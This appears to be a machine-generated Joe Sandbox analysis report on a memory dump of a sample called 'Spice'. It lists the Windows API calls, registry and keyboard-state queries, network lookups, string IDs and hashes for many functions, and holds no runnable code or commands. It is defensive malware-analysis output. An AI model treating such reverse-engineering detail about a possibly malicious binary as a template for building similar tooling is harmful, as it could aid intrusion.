                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2751501086-0
                                                                                                                                                                                                                                      • Opcode ID: c7a02066f76ddfb531c4c63807b79db9ecd7592dd563fc33a1e3bbb4927a3367
                                                                                                                                                                                                                                      • Instruction ID: 32f153690d57b6d65ae04f629e0e7ed93ca806479f4d42d3c29cd439410f6090
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7a02066f76ddfb531c4c63807b79db9ecd7592dd563fc33a1e3bbb4927a3367
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9371E271644619FFEB209B54CC85FAAFFA4FF44328F14121AF628762D1CBB26851DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC8489
                                                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EC84BE
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EC84DA
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EC84F6
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EC8520
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EC8548
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EC8553
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EC8558
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                      • API String ID: 1411258926-22481851
                                                                                                                                                                                                                                      • Opcode ID: d1bf765f323623fa3e81bea7635dd6d6ab530fdd2156fb91842d8b51531c7d19
                                                                                                                                                                                                                                      • Instruction ID: 5613c98394336b43ee928aa24ea8ffc9b828eede372a798bb04192c7940427ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1bf765f323623fa3e81bea7635dd6d6ab530fdd2156fb91842d8b51531c7d19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E410672C1022DABCF15EBA4DD95EEEB7B8FF04340F045169E819B2161EB319E06DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                                                                                                                                      • Opcode ID: 4484c2f9b184188172b3f2677065950095b66edbe79c1fee78851bf85a0a818e
                                                                                                                                                                                                                                      • Instruction ID: babd819f75875c49ff07cae4a20545fc473f1b6f574436cd23a8df7e96f18a6d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4484c2f9b184188172b3f2677065950095b66edbe79c1fee78851bf85a0a818e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84414B3050426ECBDF04EF90E851AEE3764AF51304FA06495FD566B292DB30ED5ADBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                        • Part of subcall function 00E8153B: _memmove.LIBCMT ref: 00E815C4
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ED58EB
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ED5901
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED5912
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ED5924
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ED5935
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: SendString$_memmove
                                                                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                                                                                                                                      • Opcode ID: 4d6c5811f9ac003c811312acc7903d51174503557314fcb6e3af91b29f01dc80
                                                                                                                                                                                                                                      • Instruction ID: 2d902af0f563874ecb60450ef9a061b802bd3e553a477fb212bc704d4a0d8951
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d6c5811f9ac003c811312acc7903d51174503557314fcb6e3af91b29f01dc80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4911B231950129B9E720F7A5EC5ADFF7BBCEBD1B50F40046AB819B20D0DE705D06C6A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                                                                                                                                      • Opcode ID: 4d740e6aa8fb04a3425c2e876fc423d5a9e1428623317d06e15112b824c17b72
                                                                                                                                                                                                                                      • Instruction ID: 9d76237c49fb0b5136f73c04539da4ee7f42478f6d0b3ae9c682e383ded901c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d740e6aa8fb04a3425c2e876fc423d5a9e1428623317d06e15112b824c17b72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC113671504118ABDF10B7609C4AEEAB7FCEF50710F0451AAF004B22D1EF719982DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00ED5535
                                                                                                                                                                                                                                        • Part of subcall function 00E90859: timeGetTime.WINMM(?,00000002,00E7C22C), ref: 00E9085D
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00ED5561
                                                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00ED5585
                                                                                                                                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ED55A7
                                                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 00ED55C6
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ED55D4
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00ED55F3
                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00ED55FE
                                                                                                                                                                                                                                      • IsWindow.USER32 ref: 00ED560A
                                                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 00ED561B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                      • Opcode ID: db4afad86419c619b55e99c5be4189e041a82e69ba6024cbca35d530f779928f
                                                                                                                                                                                                                                      • Instruction ID: def274291ecbbaf77671b7022abcd82e3ae81df022cc5156212b0c924b00c939
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db4afad86419c619b55e99c5be4189e041a82e69ba6024cbca35d530f779928f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6421C97110470CAFEB915B60ED89F363F6BFB443A5F48242AF40191261CF758D52BB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00EDDC2D
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EDDCC0
                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00EDDCD4
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F03D4C,00000000,00000001,00F2B86C,?), ref: 00EDDD20
                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EDDD8F
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00EDDDE7
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EDDE24
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00EDDE60
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EDDE83
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00EDDE8A
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EDDEC1
                                                                                                                                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00EDDEC3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1246142700-0
                                                                                                                                                                                                                                      • Opcode ID: 560be7c3b942fab6f698622c9cd8fe7cc5ef4343301dfd2615fec0bb2548d8e5
                                                                                                                                                                                                                                      • Instruction ID: 4675d5198835b3b0e6048360c1a095df055be5b444506d53852b35aebecc3c5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 560be7c3b942fab6f698622c9cd8fe7cc5ef4343301dfd2615fec0bb2548d8e5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9B1C775A00109AFDB14DFA4C889EAEBBF9FF48304F149459E909EB351DB30AD46DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ED0896
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00ED0901
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00ED0921
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00ED0938
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00ED0967
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00ED0978
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00ED09A4
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00ED09B2
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00ED09DB
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00ED09E9
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00ED0A12
                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00ED0A20
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                      • Opcode ID: d7e7825520198510d2a1d2980785d01fc0f8e6c6ce4a2be76ba73d296761920e
                                                                                                                                                                                                                                      • Instruction ID: 0c2d5803217b4a988ad805ff22d779ecfc7f35a38fc01ece76dead78e03e0437
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e7825520198510d2a1d2980785d01fc0f8e6c6ce4a2be76ba73d296761920e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951C734A0478829FB35DBB088157AABFF4DF41384F4C559B85C26B3C3DA649A4DCBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00ECCE1C
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00ECCE2E
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ECCE8C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00ECCE97
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00ECCEA9
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ECCEFD
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ECCF0B
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00ECCF1C
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ECCF5F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ECCF6D
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ECCF8A
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00ECCF97
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                                                      • Opcode ID: 50f96f8c172231a8b6d520d042262d52ad32614487ce267cda4105c6c3054219
                                                                                                                                                                                                                                      • Instruction ID: 2d672b2ac3e34a8e0e928803657fee1d23c80e3ae68f7ea0c18baae6627e4cd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50f96f8c172231a8b6d520d042262d52ad32614487ce267cda4105c6c3054219
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58512171B00209AFDB14CF69CD95FADBBB6FB88711F14812DF519E7290DB7199018B50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E71F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72412,?,00000000,?,?,?,?,00E71AA7,00000000,?), ref: 00E71F76
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E724AF
                                                                                                                                                                                                                                      • KillTimer.USER32(-00000001,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00E7254A
                                                                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00EABFE7
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00EAC018
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00EAC02F
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00EAC04B
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EAC05D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                                                                      • Opcode ID: 1708efb43119dfac94e3911b69a81f7143f8f41b62cdacc8fb9abe57262451cf
                                                                                                                                                                                                                                      • Instruction ID: d1384aa179f41dc2f0cb49c4f3710bd8a84a229649c889f9e1bd73afa9efd6b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1708efb43119dfac94e3911b69a81f7143f8f41b62cdacc8fb9abe57262451cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6618C31104708DFDB35AF14C948B2A77F2FB4532AF24E51DE55A6AA60C771B880EF91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729AB: GetWindowLongW.USER32(?,000000EB), ref: 00E729BC
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00E725AF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                                                                      • Opcode ID: 2786091c72e433f7ba8fc5898cc82a1f7f396b0b8f1022f28e67d0381b7593dd
                                                                                                                                                                                                                                      • Instruction ID: 3dbb7f25d8be2bb42ee2fcaed481fbc4495668ddc55e302f07daff9bd6c8059d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2786091c72e433f7ba8fc5898cc82a1f7f396b0b8f1022f28e67d0381b7593dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6941E830004504AFDB205F68DC88BB93765FB0A335F18926AFE69AE1E5CB308C41EB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E90B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E82A3E,?,00008000), ref: 00E90BA7
